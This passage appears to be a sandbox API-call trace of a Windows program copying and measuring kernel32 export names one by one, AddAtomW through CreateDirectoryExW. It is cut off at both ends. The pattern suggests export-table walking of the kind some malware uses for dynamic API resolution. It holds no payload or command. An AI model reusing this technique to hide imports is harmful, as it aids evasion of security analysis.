(in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.775] lstrlenA (lpString="ADDATOMW") returned 8 [0085.775] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.775] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.775] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.775] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.775] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.775] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.775] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.775] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.775] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.776] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.776] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.776] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.776] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.776] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.776] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.776] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.776] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.776] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.776] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.776] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.776] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.776] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.776] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.776] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.776] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.776] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.776] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.776] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.777] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.777] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.777] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.777] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.777] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.777] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.777] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.777] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.777] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.777] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.777] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.777] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.777] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.777] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.777] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.777] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.777] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.777] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.778] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.778] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.778] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.778] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.778] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.778] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.778] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.778] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.778] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.778] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.778] lstrlenA (lpString="BEEP") returned 4 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.778] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.778] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.778] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.778] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.778] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.778] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.778] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.778] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.778] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.779] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.779] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.779] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.779] lstrlenA (lpString="CANCELIO") returned 8 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.779] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.779] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.779] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.779] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.779] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.779] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.779] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.779] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.779] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.779] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.779] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.779] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.779] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.779] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.779] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.780] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.780] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.780] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.780] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.780] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.780] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.780] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.780] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.780] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.780] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.780] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.780] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.780] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.780] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.780] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.780] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.780] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.780] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.780] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.781] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.781] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.781] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.781] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.781] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.781] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.781] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.781] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.781] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.781] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.781] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.781] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.781] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.781] lstrlenA (lpString="COPYFILEA") returned 9 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.781] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.781] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.781] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.781] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.782] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.782] lstrlenA (lpString="COPYFILEW") returned 9 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.782] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.782] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.782] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.782] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.782] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.782] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.782] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.782] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.782] 